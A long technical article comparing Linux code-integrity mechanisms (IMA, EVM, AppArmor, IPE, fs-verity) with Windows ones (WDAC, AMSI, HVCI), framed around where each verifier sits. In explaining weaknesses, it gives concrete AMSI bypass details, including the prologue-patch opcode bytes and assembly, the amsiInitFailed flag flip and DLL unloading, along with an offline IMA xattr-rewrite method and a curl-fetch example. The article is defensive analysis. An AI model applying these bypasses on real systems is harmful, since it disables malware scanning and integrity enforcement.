49 min read

Two Routes to Code Integrity: Linux IMA + AppArmor vs Windows WDAC + AMSI

Linux and Windows answer one question -- "is this code allowed to run?" -- with very different machinery. Where the verifier lives matters more than how strong it is.

Permalink

1. Two bypasses, same architectural shape

On a Windows 11 desktop, an attacker with a PowerShell session under their control can blind Microsoft Defender to every script that session ever evaluates by overwriting six bytes inside one function in amsi.dll. The Antimalware Scan Interface, the in-process bridge between scripting hosts and the registered antivirus product, dutifully reports "clean" on every subsequent buffer because the prologue of AmsiScanBuffer has been patched to mov eax, 0; ret (B8 00 00 00 00 C3).

The interface ships exactly as Microsoft documents it, and the function still has the signature in MSDN: the attacker did not need to break anything. They needed only to write into the address space they already owned.

On a Linux server, a different attacker with offline access to the disk -- recovered from a stolen laptop, a forensics image, a hostile cloud-provider snapshot -- mounts the filesystem and rewrites a system binary together with the file's security.ima extended attribute. When the box boots, the kernel's Integrity Measurement Architecture hashes the binary at exec time, compares the hash to the value stored in security.ima, sees a match, and allows execution. Without the Extended Verification Module, IMA appraisal has no defence against this offline-rewrite attack -- the reference hash is sitting next to the file the attacker just replaced.

Both operating systems claim fail-closed code-integrity enforcement. Both lose to a single architectural mistake about where the check runs. The mistakes are different in detail and identical in shape: the verifier is reachable by the attacker. On Windows the attacker shares the script host's address space with the scanner. On Linux the attacker shares the on-disk container with the reference hash.

This article exists to make that symmetry visible. The two stacks reached their 2026 form by very different routes -- Linux composes six narrow Linux Security Modules and one userspace daemon, Windows ships one tightly-coupled product line -- but the breakthroughs on each side answered the same question: how do you move the verifier out of reach?

The Linux answer was EVM (HMAC the extended attributes that IMA depends on) and IPE (decide on immutable file properties rather than file contents). The Windows answer was HVCI (lift the kernel-mode code-integrity check into a hypervisor-isolated secure kernel). The names are different. The lesson is one.

Why did Linux and Windows arrive at such different architectures in the first place? That story starts in an IBM research lab in 2003.

2. The question both operating systems are trying to answer

Both lineages exist to answer one question -- "is this code allowed to run?" -- but they put the check in completely different places. Before we can compare them honestly, we need a shared vocabulary for the three layers any production code-integrity stack must cover.

The first layer is code integrity itself, often abbreviated CI: a gate on the file's content or its signer. Did this .so come from a package my distribution signed? Does this .exe match an Authenticode chain rooted in a publisher my policy trusts? The answer is binary. The hook fires before the process loads the bytes.

The second layer is mandatory access control, or MAC. Now the process is running. What can it do? Can nginx open /etc/shadow? Can mshta.exe spawn cmd.exe? MAC is enforced by the kernel above discretionary access control and cannot be overridden by userspace privileges.

Mandatory Access Control (MAC)

A kernel-enforced policy layer above traditional discretionary access control (DAC). Unlike DAC, where the file owner sets permissions, MAC policy is set by the system administrator and applied uniformly to all processes; no user, including root, can override it without changing the policy itself.

The third layer is content inspection: gating not on the file but on the buffer the interpreter is about to evaluate. The PowerShell engine has just deobfuscated a long string into a script block. Is the script block malicious? Linux has no production equivalent. Windows ships AMSI for exactly this.

Where each operating system puts these checks tells you almost everything about its architectural philosophy.

Linux puts every check on a Linux Security Module hook. IMA registers at bprm_check (the kernel hook that fires when a binary is about to be executed), file_mmap with MAY_EXEC, module_check, firmware_check, and kexec_*. AppArmor and SELinux register at the syscall-level access hooks. fapolicyd rides on top of fanotify. IPE hooks op=EXECUTE. The kernel is the trust boundary, and every mechanism is a polite tenant inside it.

Linux Security Module (LSM)

The kernel framework, merged into Linux 2.6.0 in December 2003, that hosts pluggable security modules at well-defined hook points in the kernel. LSMs include SELinux, AppArmor, Smack, Tomoyo, IMA, EVM, IPE, BPF LSM, and Landlock; multiple modules can coexist via "LSM stacking".

Windows takes the opposite path. The PE loader is the gate for user-mode code integrity (UMCI). The kernel-mode code-integrity check is, in the modern stack, moved out of the normal kernel into a small secure kernel running on top of Hyper-V -- Hypervisor-protected Code Integrity, HVCI. The script broker runs in-process with each scripting host. Cloud reputation is consulted via the Intelligent Security Graph and exposed to consumers as Smart App Control.

TPM Platform Configuration Register (PCR)

A monotonically extendable hash register inside a Trusted Platform Module. New measurements are folded in with PCR_new = SHA256(PCR_old || measurement). Once extended, the value cannot be rolled back without resetting the TPM. IMA extends file-content hashes into PCR 10; the Windows Measured Boot chain uses PCRs 0-7 and 11-14.

The architectural philosophy comes down to a sentence each. Linux trusts the kernel surface and packs every integrity mechanism into it as a separate LSM. Windows trusts a hypervisor-isolated secure kernel and uses it to host the integrity logic the normal kernel cannot be trusted to run honestly.

Ctrl + scroll to zoom
The three layers of code-integrity enforcement, and where Linux and Windows place each mechanism.

Neither stack started this way. The 2026 stack on each side is the accumulated answer to fifteen years of failures. Here is how they grew up.

3. Two genesis stories

In 2003, four IBM researchers at the T. J. Watson Research Center -- Reiner Sailer, Xiaolan Zhang, Trent Jaeger, and Leendert van Doorn -- tried to convince the USENIX Security community that you could prove the integrity of a Linux web server to a remote verifier. Their paper, Design and Implementation of a TCG-based Integrity Measurement Architecture, shipped at the 13th USENIX Security Symposium in 2004. It proposed hashing every executable file at load time, extending each hash into a TPM platform configuration register, and sending the resulting measurement list to a remote verifier who could compare it to a known-good manifest.

The performance evaluation measured the cost on an IBM Netvista with a 2.4 GHz Pentium 4: the file_mmap LSM hook added 0.08 microseconds per call on a cache hit, and SHA-1 fingerprinting ran at roughly 80 MB/s. The headline claim was that more than 99.9% of measure calls landed on the cached path, so the overhead was essentially free.

Pentium 4-era SHA-1 at 80 MB/s vs Ice Lake-era SHA-NI-accelerated SHA-256 at roughly 2 GB/s per core: a 25x throughput jump in twenty years. The original paper's qualitative finding -- cache hit dominates, overhead is negligible -- holds even more strongly on modern silicon.

It took five years for that proposal to reach the kernel. IMA's measurement-only mode was merged in Linux 2.6.30 in June 2009. It hashed files at bprm_check, file_mmap, and module_check, extended TPM PCR 10, and otherwise let everything run.

The "is this hash allowed?" question would have to wait three more years. The Extended Verification Module landed in Linux 3.2 in January 2012; digital-signature mode for EVM followed in 3.3 in March 2012; and IMA-appraise, the enforcement extension that finally let the kernel return -EPERM when a file's hash did not match security.ima, merged in Linux 3.7 in December 2012. The same LWN article frames the cadence plainly: "Much of IMA was added to the kernel in 2.6.30, but another piece, the extended verification module (EVM) was not merged until 3.2 ... Digital signature support was added to EVM in 3.3, and IMA appraisal is currently under review." Mimi Zohar's appraisal patchset is the canonical lore.kernel.org artifact of that final step.

AppArmor took a different, longer road. It was born inside Immunix in 1998 under the name "SubDomain", a path-based confinement layer designed to stop privilege-escalation exploits from doing anything the binary's profile did not name. Novell acquired Immunix in 2005, renamed SubDomain to AppArmor, and shipped it as the default mandatory access control layer on SLES and openSUSE. According to the Ubuntu AppArmor wiki, "AppArmor support was first introduced in Ubuntu 7.04, and is turned on by default in Ubuntu 7.10 and later" -- so by October 2007 AppArmor was already a default-on production MAC on the most-deployed Linux desktop distribution.

Mainlining did not happen until October 2010, when AppArmor finally landed in Linux 2.6.36. Seven years out of tree, three years default-on in Ubuntu, before the kernel community accepted it.

The contrast with SELinux is sharp. SELinux merged into Linux 2.6.0 in December 2003 -- barely a year after the LSM framework was created. SELinux was, in fact, the reason the LSM framework existed.

The Windows lineage starts in a different building entirely. AppLocker shipped with Windows 7 and Windows Server 2008 R2 in 2009: a user-mode-only allowlist, with no hypervisor or kernel-mode backing, and rules tied to file paths, publishers, or hashes. AppLocker is still supported on modern Windows but "isn't getting new feature improvements"; the modern successor is App Control for Business.

Windows 10 RTM (version 1507, July 2015) shipped the first version of Device Guard along with AMSI and PowerShell 5.0, which integrated with AMSI from day one. Device Guard became known as Windows Defender Application Control (WDAC) and then, in 2024, was renamed once more to App Control for Business. User-mode code integrity (UMCI) became a policy option, FilePath rules were added in Windows 10 version 1903, multiple-policy authoring landed in the same release, and Smart App Control made its consumer debut in Windows 11 22H2 in September 2022.

Ctrl + scroll to zoom
Code-integrity lineages on Linux and Windows, 2003 to 2024. Linux composes; Windows consolidates.

Two timelines, two design philosophies, both shipping their v1 with the same kind of mistake. The next section makes that concrete.

4. Where the naive approach breaks

Both stacks shipped their first version with the check in the wrong place. Two stories make this concrete; two more refine it.

Story A: IMA-as-shipped (2009) without EVM

When IMA reached the kernel in Linux 2.6.30, it hashed the file at bprm_check and stored the reference hash in the file's security.ima extended attribute. That is what an attacker with offline disk access needs to defeat the check, and exactly nothing else. Mount the filesystem from another box, swap the binary for a malicious one, recompute the SHA over the new binary, write the new value into security.ima. Boot the box. The kernel hashes the malicious binary at exec, reads the matching xattr the attacker just wrote, and lets the syscall through.

This is the offline-tampering attacker model EVM was designed to defeat. The contemporaneous LWN coverage put it plainly: "IMA can be subverted by 'offline' attacks, where file data or metadata is changed out from under IMA. Mimi Zohar has proposed the extended verification module (EVM) patch set as a means to protect against these offline attacks."

The EVM v5 patchset, posted by Zohar in May 2011, describes the design directly: "Extended Verification Module (EVM) detects offline tampering of the security extended attributes (e.g. security.selinux, security.SMACK64, security.ima) ... initial method maintains an HMAC-sha1 across a set of security extended attributes, storing the HMAC as the extended attribute 'security.evm'."

Story B: AMSI as shipped (2015) inside the script host

AMSI's design is documented in How AMSI helps you defend against malware: "Script (malicious or otherwise), might go through several passes of de-obfuscation. But you ultimately need to supply the scripting engine with plain, un-obfuscated code. And that's the point at which you invoke the AMSI APIs."

A scripting host -- PowerShell, WSH, MSHTA, Office VBA, the UAC installer dialog -- calls AmsiInitialize, then for every plain-text script buffer it is about to execute calls AmsiScanBuffer or AmsiScanString. The call is routed through amsi.dll, loaded into the host process, which dispatches to the registered IAntimalwareProvider COM server. Defender is the default provider.

The detection logic is sound. The trust boundary is not. The attacker already controls the script host. Three single-shot bypass techniques have lived in red-team toolkits since 2016:

  1. Patch AmsiScanBuffer's prologue in memory to mov eax, 0; ret (B8 00 00 00 00 C3). Six bytes of opcode rewrite, no syscalls required, blinds the scanner permanently for this process.
  2. Set System.Management.Automation.AmsiUtils.amsiInitFailed = true via reflection. PowerShell checks the flag on every scan path and short-circuits.
  3. Unload amsi.dll via FreeLibrary. There is no scanner left to call.

Microsoft tracks this so closely that its own "Applications that can bypass App Control" deny list calls out the AMSI-bypass-capable versions of system.management.automation.dll by hash. The defender's authoritative list of files-to-block treats specific signed Microsoft DLLs as named threats.

The same Microsoft bypass list also enumerates mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, wmic.exe, bash.exe, wsl.exe, runscripthelper.exe, and dozens of others -- 40+ entries today, growing whenever a new Microsoft-signed binary turns out to host an attacker-friendly evaluator.
JavaScript Why AMSI's trust boundary is wrong: the simplest model of an in-process bypass
// In Windows, AMSI scans each plain-text script buffer just before
// the scripting engine evaluates it. The scanner lives in amsi.dll,
// loaded into the script host process. The attacker who controls
// that process can rewrite the function's first few bytes.
//
// This toy model shows the consequence: once "patched", the scanner
// returns CLEAN regardless of input, and the assertion below holds
// for every possible payload.

const AMSI_RESULT_CLEAN = 0;
const AMSI_RESULT_MALWARE = 32768;

function amsiScanBuffer(buf, patched) {
if (patched) return AMSI_RESULT_CLEAN;
if (buf.includes("Invoke-Mimikatz")) return AMSI_RESULT_MALWARE;
return AMSI_RESULT_CLEAN;
}

console.log("Normal mode:");
console.log("  clean payload:    ", amsiScanBuffer("Get-Process", false));
console.log("  malicious payload:", amsiScanBuffer("Invoke-Mimikatz", false));

console.log("\nAfter six-byte patch:");
console.log("  clean payload:    ", amsiScanBuffer("Get-Process", true));
console.log("  malicious payload:", amsiScanBuffer("Invoke-Mimikatz", true));

// The takeaway: no input ever produces MALWARE once the scanner is patched.
// Strengthening AMSI's signature engine cannot fix this. The scanner
// must move out of the script host's address space.

Press Run to execute.

Story C: WDAC's "trust all Microsoft-signed code" anti-pattern

A WDAC policy that trusts code signed by Microsoft also trusts every binary Microsoft has ever signed. That set includes mshta.exe, wscript.exe, cscript.exe, msbuild.exe, wmic.exe, system.management.automation.dll, and the 40-plus other binaries enumerated on Microsoft's own App Control bypass list. The LOLBAS community catalogue widens the field to roughly 200 living-off-the-land binaries with explicit MITRE ATT&CK technique mappings.

The pattern is structural: WDAC grants trust at signer granularity (a chain rooted at "Microsoft Corporation"); attackers exploit at binary granularity (the specific mshta.exe that will happily evaluate an HTA blob containing a PowerShell stager). Any non-trivial WDAC policy must therefore contain explicit hash-level denies for the known-bad versions, and must keep growing those denies as Microsoft ships new signed binaries.

Story D: fapolicyd's permissive-window failure

fapolicyd is the Red Hat userspace allowlister. It sits on the fanotify permission channel and answers "may this open or exec proceed?" against a compiled rule database. It does not have IMA's offline-tampering problem because trust is inherited from the RPM database: "An application is trusted when the system package manager correctly installs it and therefore registered in the system RPM database. The fapolicyd daemon uses the RPM database as a list of trusted binaries and scripts."

What it does have is an operational footgun. Setting permissive=1 "just for troubleshooting" silently disables enforcement. Terminating the daemon causes the kernel to fail open after the fanotify response timeout. The architectural choice -- userspace daemon over kernel-mode hook -- is what makes both failure modes possible.

The check was strong. The boundary protecting the check was weak. On IMA-as-shipped the reference hash sat next to the file the attacker rewrote. On AMSI the scanner sat inside the process the attacker controlled. On WDAC the trust grant was wider than the exploitation unit. On fapolicyd the verifier was a userspace process that could be terminated. Four different stacks, four different boundary failures, one identical lesson.

Bypass classStackConcrete exampleRoot cause
Offline metadata swapIMA without EVMRewrite binary and matching security.ima xattr from rescue mediaReference value stored next to the file under attacker control
In-process scanner patchAMSI in PowerShellmov eax, AMSI_RESULT_CLEAN; ret over AmsiScanBuffer prologueScanner shares address space with the script host the attacker runs in
Signer-vs-binary mismatchWDAC Publisher rulesAllow Microsoft-signed code, attacker runs mshta.exeTrust grant is coarser than the exploitable unit
Daemon livenessfapolicydTerminate fapolicyd or set permissive=1Verifier is a userspace process with no kernel-rooted backstop

Each of these failures has the same shape: the check was strong, the boundary protecting the check was weak. Both operating systems noticed, and fixed it in 2012 and 2016 in very different ways. Both fixes followed the same principle.

5. The architectural pivots

Both lineages reached the same conclusion at the same time: strengthen the boundary, not the check. Each pivot moved the trust boundary outward, beyond the place the attacker could reach.

EVM (Linux 3.2, January 2012): the xattrs become non-forgeable

The Extended Verification Module computes an HMAC over the security-relevant extended attributes -- security.ima, security.selinux, security.SMACK64, security.apparmor, security.capability -- plus inode metadata (UID, GID, mode, generation), and stores the result in security.evm. The HMAC key is loaded into the kernel keyring at boot, ideally sealed to a TPM 2.0 PCR set so the key is not retrievable except on a machine whose boot state matches the sealing measurement. The kernel keyring documentation for trusted and encrypted keys describes the substrate.

An offline attacker with disk access still cannot forge security.evm without the HMAC key. Digital-signature mode (EVM portable signatures, Linux 3.3) gives the same guarantee without any on-box key material. The check did not get cryptographically stronger: HMAC-SHA256 was not new in 2012. What changed was that the reference value the check consults moved from "an xattr next to the file" to "an xattr whose integrity is bound to a key the attacker does not have". Red Hat documents the modern setup in Enhancing security with the kernel integrity subsystem.

Extended Verification Module (EVM)

The Linux integrity module that protects the security-relevant extended attributes IMA depends on. EVM computes an HMAC (or digital signature) over the xattr set plus inode metadata and stores it in security.evm. Without the EVM key, an offline attacker cannot rewrite a binary and its matching security.ima to produce a valid pair.

Ctrl + scroll to zoom
IMA + EVM appraisal flow at bprm_check. EVM verifies the integrity of the xattr IMA reads; without EVM, IMA's reference value is offline-rewritable.

IMA-appraise (Linux 3.7, December 2012): from observation to enforcement

The merge cadence on the kernel side is itself part of the story. Measurement-only IMA shipped in 2.6.30 in 2009. EVM merged in 3.2 in January 2012. EVM digital signatures merged in 3.3 in March 2012. IMA-appraise, which finally lets the kernel return -EPERM on a hash mismatch, merged in Linux 3.7 in December 2012. Three and a half years from "we hash files" to "we refuse to run files that fail the hash". The gap was not engineering laziness; it was the time it took to design and merge the boundary-strengthening pieces that made enforcement safe to enable.

HVCI / Memory Integrity (Windows 10 1607, August 2016): the secure kernel

Windows took the equivalent step four years later, but at a different layer. Virtualization-Based Security (VBS) splits Windows into Virtual Trust Level 0 -- the normal kernel everyone has been writing rootkits for since 1993 -- and Virtual Trust Level 1, a small secure kernel hosted by Hyper-V. The kernel-mode Code Integrity check that gates loading of every driver is moved into VTL1. A VTL0 attacker with full SYSTEM, even one who has loaded a malicious driver, cannot patch the VTL1 verifier; they cannot even read its memory.

Virtualization-Based Security (VBS) / VTL0 vs VTL1

Windows' Hyper-V-rooted split that puts a small secure kernel in VTL1, isolated from the normal Windows kernel (VTL0) by the hypervisor. Hypervisor-protected Code Integrity (HVCI), exposed in Windows Settings as "Memory integrity", uses VTL1 to host the kernel-mode code-integrity check, so a VTL0 attacker with SYSTEM cannot patch the verifier or downgrade its policy.

Microsoft's HVCI documentation frames the W^X invariant HVCI enforces on kernel pages: "memory integrity ... protects and hardens Windows by running kernel mode code integrity within the isolated virtual environment of VBS ... ensuring that kernel memory pages are only made executable after passing code integrity checks inside the secure runtime environment, and executable pages themselves are never writable." A kernel page can be writable or executable; never both at the same time. The split is enforced by the hypervisor.

"HVCI", "Memory Integrity", and "kernel-mode code integrity running in VBS" are the same mechanism. Microsoft's product-name churn here is unusually thick: the Windows Settings UI calls it Memory Integrity, the documentation page is titled "Enable virtualization-based protection of code integrity", the underlying capability is HVCI, and Microsoft also markets the same hardware-and-software bundle as "Secured-Core PC".
Ctrl + scroll to zoom
HVCI relocates the kernel-mode code-integrity check into VTL1. A VTL0 attacker with SYSTEM cannot reach the verifier.

IPE (Linux 6.12, November 2024): property-based decisions

The most recent Linux pivot moves further still. Integrity Policy Enforcement, upstreamed in Linux 6.12 in November 2024 from a Microsoft-contributed patch series (source on GitHub), does not hash files at all. Its kernel documentation is explicit: "Integrity Policy Enforcement (IPE) is a Linux Security Module that takes a complementary approach to access control. Unlike traditional access control mechanisms that rely on labels and paths for decision-making, IPE focuses on the immutable security properties inherent to system components." A policy rule looks like:

op=EXECUTE dmverity_signature=TRUE dmverity_roothash=sha256:<hex> action=ALLOW
op=EXECUTE fsverity_signature=TRUE action=ALLOW
op=EXECUTE action=DENY

The kernel is not asked "what is the SHA-256 of this file?" at op=EXECUTE time. It is asked "did this file come from a dm-verity device whose root hash matches one of our trusted signatures?" The verifier has nothing to compute per access; it has only to read a pre-computed property. The trust boundary has moved out to whoever signed the dm-verity image at build time.

fs-verity (Linux 5.4, November 2019): O(log n) per page

The cryptographic complement is fs-verity, upstreamed in Linux 5.4 in November 2019 by Eric Biggers and Theodore Ts'o at Google. The kernel docs describe the trick: "fs-verity is similar to dm-verity but works on files rather than block devices ... userspace can execute an ioctl that causes the filesystem to build a Merkle tree for the file and persist it to a filesystem-specific location ... Userspace can use another ioctl to retrieve the root hash ... in constant time, regardless of the file size."

The Merkle tree turns whole-file hashing into O(log n) verification per page read, with constant-time digest retrieval. Concretely, an APK or container layer with thousands of pages does not need a full hash on first open; the page cache verifies the leaves and intermediate Merkle nodes only for the pages actually touched. IMA can consume fs-verity's digest directly through the digest_type=verity modifier in its policy language.

The breakthrough was not a stronger check. It was moving the check out of the attacker's address space.

Each pivot moved the trust boundary outward in a different direction. EVM moved the integrity root from "xattr next to the file" to "HMAC-keyed xattr, key sealed to TPM PCRs". HVCI moved the kernel-mode verifier from "in the kernel the attacker can patch" to "in a secure kernel the attacker cannot reach without breaking the hypervisor". IPE moved the per-access decision from "recompute a file's hash" to "look up a precomputed property". Fs-verity collapsed the per-access cost from O(n) on the file to O(log n) on a Merkle path.

The crypto was already strong. The breakthrough was the geometry of where the verifier lived.

By 2020 both stacks looked dramatically different from their 2009 and 2015 originals. Here is what each one looks like today, side by side.

6. The stack today, side by side

Eleven moving parts. Here is how they line up.

LinuxWindowsLayer
IMA appraise + EVMApp Control (WDAC) UMCIUser-mode code integrity
Kernel module signingApp Control + HVCI driver enforcementKernel-mode code integrity
fs-verity + dm-verityHVCI page-level W^X + signed cataloguesPage-level integrity
AppArmor / SELinux(no direct analogue; closest is AppContainer / ASR)Mandatory access control
fapolicydApp Control + AppLockerUser-space allowlist
IPEApp Control (FilePath / hash rules)Property-based code integrity
(no direct analogue)AMSIScript content scan
(no direct analogue)Smart App Control + ISGCloud reputation

The mapping is not 1-to-1 in either direction. Linux composes; Windows consolidates. To compare meaningfully we have to look at each layer in turn.

6.1 Code-integrity enforcers: IMA + EVM vs WDAC vs IPE

DimensionLinux IMA + EVMWDAC (App Control)IPE
Enforcement layerVFS / LSM hook (file open, mmap, exec)PE loader (kernel CI, user-mode CI)LSM hook on op=EXECUTE
Identity primitiveFile-content hash or imasig / modsig / sigv3Authenticode chain, hash, FilePath, or ISGdm-verity root hash / fs-verity digest
Policy expressionProcedural rules (func= / mask= / fsmagic=)Signed XML compiled to binary .p7bSigned plain-text DFA
Worst-case per-accessO(n) hash on first access; O(1) cachedO(1) cached; O(n) hash on cache missO(1) (properties precomputed)
Fail-closed modeYes (appraise)Yes (enforced)Yes
Remote-attestation friendlyYes (TPM PCR 10)Indirect (Measured Boot logs)Indirect
Bypass arms raceWhole-disk swap (countered by EVM key sealing)LOLBins (Microsoft block list + community LOLBAS)Limited surface (DFA-only)

The IMA policy ABI documents the full rule grammar: action [condition ...] where action is one of measure | dont_measure | appraise | dont_appraise | audit | dont_audit | hash | dont_hash, and conditions select on func=, mask=, fsmagic=, fsuuid=, uid=, fowner=, LSM-label predicates, and the all-important appraise_type= modifier that names the signature scheme. IMA template management controls what gets recorded per measurement-list entry; the two templates used in practice today are ima-ng (d-ng|n-ng: hash-algo-prefixed digest plus name) and ima-sigv2 (d-ngv2|n-ng|sig: versioned digest plus name plus signature).

WDAC's policy rule reference defines the rule kinds operators actually write: Publisher, PcaCertificate, LeafCertificate, FileName, Version, Hash (SHA-1, SHA-256, or SHA-384), FilePath (added in 1903 and explicitly weaker because a user with write access can substitute the file), Managed Installer, and Intelligent Security Graph. The compiled output is a signed binary .p7b CIPolicy.

The same doc records the default-on audit-mode behaviour that has surprised many operators: "We recommend that you use Enabled:Audit Mode initially because it allows you to test new App Control policies before you enforce them ... By default, only kernel-mode binaries are restricted. Enabling the following rule option validates user mode executables and scripts." The Enabled:UMCI flag is what flips a WDAC policy from kernel-only to full user-mode enforcement.

Ctrl + scroll to zoom
WDAC policy evaluation. The Authenticode chain is parsed first; rule kinds are evaluated in priority order; bypass-list deny rules are normally added as a last-stop safety net.

6.2 Mandatory access control: AppArmor vs SELinux

DimensionAppArmorSELinux
ModelPath-based allowlist per binaryType-enforcement on subject x object x class
Storage of policy stateIn-memory DFA loaded from user spacesecurity.selinux xattr + compiled policy.31
GranularityProfile per executablePer-type, per-class, per-operation
Survives file renameNo (path is the identity)Yes (xattr travels with inode)
Default-on distrosUbuntu, openSUSE, SLESRHEL, Fedora, Oracle Linux, Android, ChromeOS
Authoring toolsaa-genprof, aa-logprof, aa-enforceaudit2allow, semodule, refpolicy, udica

AppArmor's kernel documentation describes the model directly: "AppArmor is MAC style security extension for the Linux kernel. It implements a task centered policy, with task 'profiles' being created and loaded from user space." A profile reads like a rule file rather than a label algebra:

/usr/sbin/nginx {
  capability net_bind_service,
  /etc/nginx/** r,
  /var/log/nginx/* w,
  /var/www/** r,
  network inet stream,
}

The kernel compiles each profile to a DFA at load time, so policy lookup is O(L) in path length. SELinux's compiled policy uses a hash-table query against compiled type-enforcement rules with an in-memory access-vector cache for O(1) hot decisions. Both are practical; they differ on which model fits the way an administrator thinks. AppArmor wins on auditability and quick authoring; SELinux wins on expressiveness and on what the Wikipedia summary calls Mandatory Access Control for multi-level security. Smack is a third in-tree LSM, simpler than SELinux, used heavily by Tizen.

6.3 Hypervisor-anchored CI: HVCI

HVCI's runtime cost is dominated by the hypercall round-trip from VTL0 to VTL1 on driver load and on each executable-page allocation. Steady-state overhead is small on hardware with the right capabilities.

Microsoft's HVCI documentation names the dependency: "Memory integrity works better with Intel Kabylake and higher processors with Mode-Based Execution Control, and AMD Zen 2 and higher processors with Guest Mode Execute Trap capabilities. Older processors rely on an emulation of these features, called Restricted User Mode, and will have a bigger impact on performance." Practitioner-visible rule of thumb: less than 5 percent overhead on MBEC/GMET-capable silicon, 10 to 20 percent on kernel-bound workloads when the CPU has to emulate.

HVCI hardware prerequisites per the OEM VBS guidance: 64-bit CPU with virtualization extensions (VT-x or AMD-V), second-level address translation (EPT or RVI), an IOMMU (VT-d or AMD-Vi), TPM 2.0, UEFI MAT, Secure MOR v2, and ideally MBEC (Intel) or GMET (AMD).

6.4 Script-level inspection: AMSI vs Linux's gap

DimensionAMSILinux IMA on scripts
What it seesDeobfuscated script buffer at execution timeWhole-file content at open or mmap
CoveragePowerShell, WSH, VBA, JScript, MSHTA, UAC installers, .NET, EdgeAny file whose func=FILE_CHECK rule matches
Provider modelCOM IAntimalwareProvider per processNone; kernel verifies signature directly
Defends against runtime obfuscationYes (sees final buffer)No (sees file as written)
Trust boundaryWrong (in-process; patchable by attacker)Right (kernel-side; attacker cannot patch)

The asymmetry is the point. AMSI sees what the interpreter is about to evaluate; IMA sees only what is on disk. AMSI catches in-memory PowerShell payloads, Office macros that decode themselves at runtime, and Invoke-Expression evaluations that never touched the filesystem. IMA's hash is final at file write time and tells you exactly nothing about what bash -c "$(curl evil)" will execute.

Constrained Language Mode

The reduced PowerShell language mode App Control forces on systems with UMCI enabled. It blocks reflection (the [System.Reflection] namespace), dynamic-type creation, and arbitrary .NET API calls. It is the runtime-side complement to App Control: even if a script gets in, its evaluation surface is dramatically reduced. This is also what makes the amsiInitFailed flag-flip bypass non-trivial under modern App Control: the reflection needed to set the flag is blocked.

6.5 Cloud reputation: Smart App Control

Smart App Control ships as a pre-baked WDAC policy bundled with Windows 11 22H2 and later. The App Control overview describes it as the consumer-facing entry point introduced in Windows 11 version 22H2 to bring application control to home users. On every fresh install SAC starts in evaluation mode for 48 hours. Microsoft's cloud reputation service silently observes the user's app inventory; on enterprise-managed devices SAC auto-disables at the end of the window unless the user explicitly opts in. Once disabled by user, policy, or the auto-disable rule, it can only be re-enabled by performing a clean install of Windows. A Settings > Reset This PC is not sufficient.

6.6 fs-verity as the per-file Merkle layer

For the data-at-rest performance story, fs-verity's ioctl(FS_IOC_ENABLE_VERITY) builds the Merkle tree, persists it next to the file, and switches the file to read-only. FS_IOC_MEASURE_VERITY returns the digest in constant time. IMA's policy language gained appraise_type=sigv3 and the digest_type=verity modifier so a rule like

appraise func=BPRM_CHECK fsmagic=0xef53 appraise_type=sigv3 digest_type=verity

asks the filesystem for the file's fs-verity digest (O(1)) and verifies the kernel-stored signature over that digest, rather than re-hashing the file even on first access. Supported on ext4, f2fs, and btrfs.

Eleven mechanisms, two architectures, one shared shape: an allowlist of trusted producers plus a hook that can refuse to honour anything outside it. The allowlist of producers is the deepest common assumption, and it is also where the next class of attacks lives.

7. Bypass arms races

Every code-integrity system on the market is in a continuous fight with the bypass it shipped with. The fights tell you what each architecture got wrong.

The AMSI bypass family

The three single-shot techniques from Section 4 -- prologue patch, amsiInitFailed flag flip, library unload -- have all been answered by partial mitigations. Microsoft has hardened AMSI provider loading to require Authenticode-signed provider DLLs from Windows 10 1903 onward. Defender ships ETW-based detection that flags in-memory patches to amsi.dll. Constrained Language Mode (forced by App Control) blocks the reflection needed to flip AmsiUtils.amsiInitFailed. None of these closes the structural problem. AMSI is by design a function call inside the script host. As long as the host process is the trust boundary, the attacker who reaches the host process wins.

The trust boundary is wrong: the host process making the AMSI call is the same process the attacker is running in.

What the canonical AMSI patch looks like in x64 assembly

The simplest in-memory patch overwrites AmsiScanBuffer's prologue with a six-byte sequence that loads AMSI_RESULT_CLEAN (0) into EAX and returns:

xor eax, eax    ; 31 C0
ret             ; C3

or, depending on the calling convention the patcher targets:

mov eax, 0x80070057   ; B8 57 00 07 80   (HRESULT E_INVALIDARG)
ret                   ; C3

Both variants are detected by modern Defender via the ETW patch detection, but neither requires kernel privileges or a syscall to apply.

The WDAC LOLBin arms race

Microsoft's App Control bypass list is a maintained document that any non-trivial WDAC policy must merge into its deny rules. The 40-plus entries include mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, addinutil.exe, aspnet_compiler.exe, bash.exe, wsl.exe, runscripthelper.exe, system.management.automation.dll, and webclnt.dll / davsvc.dll. The community LOLBAS index widens the field to roughly 200 entries with MITRE ATT&CK technique IDs.

Tooling (the WDAC Wizard, AaronLocker, Microsoft's ConfigCI PowerShell module, CiTool.exe) automates merging the deny set into a base policy and onto Intune. The asymmetry is the bottom line: trust granted at signer granularity, exploitation at binary granularity. The deny list is not a fix; it is a treadmill.

LOLBin (Living-Off-the-Land Binary)

A trusted binary, often shipped by the OS vendor and signed by the vendor's code-signing certificate, that an attacker re-purposes to bypass an allowlist or to perform actions that would be blocked if attempted with non-vendor tooling. Examples on Windows: mshta.exe to evaluate HTA scripts, regsvr32.exe to execute a remote scriptlet, installutil.exe to run code via a designed-for-development assembly loader.

fapolicyd permissive-window

This is not a cryptographic bypass; it is the architectural choice (userspace daemon over fanotify) showing its operational seam. A privileged operator who sets permissive=1 to debug a noisy rule and forgets to revert has silently disabled enforcement. If the daemon dies under load or after a bad rule deploy, the kernel waits for the fanotify response timeout and then fails open. There is no failsafe equivalent of HVCI's "the verifier is in another address space" guarantee.

IMA / EVM offline-key attacks

EVM is only as strong as its key custody. If the HMAC key is loaded from a file on disk (the worst-case configuration), an attacker with root on a running system can read it, then perform the offline-rewrite attack of Section 4 with a valid security.evm HMAC. TPM-sealed keys close this path on hardware that supports sealing; some installations skip the seal step "until we add a TPM" and never do. Asymmetric (EVM portable signatures) mode avoids on-box key custody but requires a per-package signing pipeline most distributions have not built.

The cross-stack symmetry

Both lineages obey two architectural rules, and both have at least one place where they break each rule:

Bypass classLinux instanceWindows instanceRoot causePartial mitigation
Verifier shares address space with attacker(script interpreters; no in-kernel interpreter scanner)AMSI prologue patch, amsiInitFailed flag flipSoftware-only protection of an in-process secret is impossibleETW patch detection, signed providers, Constrained Language Mode
